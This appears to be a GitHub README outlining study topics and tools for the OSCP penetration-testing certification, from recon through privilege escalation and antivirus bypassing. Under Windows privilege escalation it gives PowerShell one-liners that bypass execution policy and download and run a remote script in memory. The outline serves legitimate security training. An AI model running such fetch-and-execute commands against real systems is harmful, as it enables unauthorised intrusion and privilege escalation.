Skip to content
OSCP Preparation
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.


PWK Syllabus

OSCP like VulnHub Game

Linux and Bash

  1. Linux Journey -
  2. Bash for Beginners -
  3. Explainshell -

Basic tools

  1. Netcat: Most important tool in the entire course. Understand what it does, what options you have, difference between a reverse shell and a bind shell. Experiment a lot with it.
  2. Ncat: Netcat’s mature brother, supports SSL. Part of Nmap.
  3. Wireshark: Network analysis tool, play with it while browsing the internet, connecting to FTP, read/write PCAP files.
  4. TCPdump: Not all machines have that cute GUI, you could be stuck with a terminal.

Passive Recon

  1. Google dorks
  2. Whois
  3. Netcraft
  4. Recon-ng

Active Recon

Buffer Overflow

Using public exploits

File Transfer

Windows Privilege Escalation

./ --database 2019-11-06-mssb.xlsx --systeminfo json-systeminfo.txt 
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(''); Find-AllVulns -Command 'start powershell.exe'" 
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks -Command 'start powershell.exe'" 

Linux Privilege Escalation

Client Side Attacks

Web Application Attacks

  1. OWASP top10 2017

  2. Training

Password Attacks

  1. Hydra
  2. JTR
  3. Medusa

Port redirection/tunneling

Metasploit Framework

Antivirus Bypassing

You can’t perform that action at this time.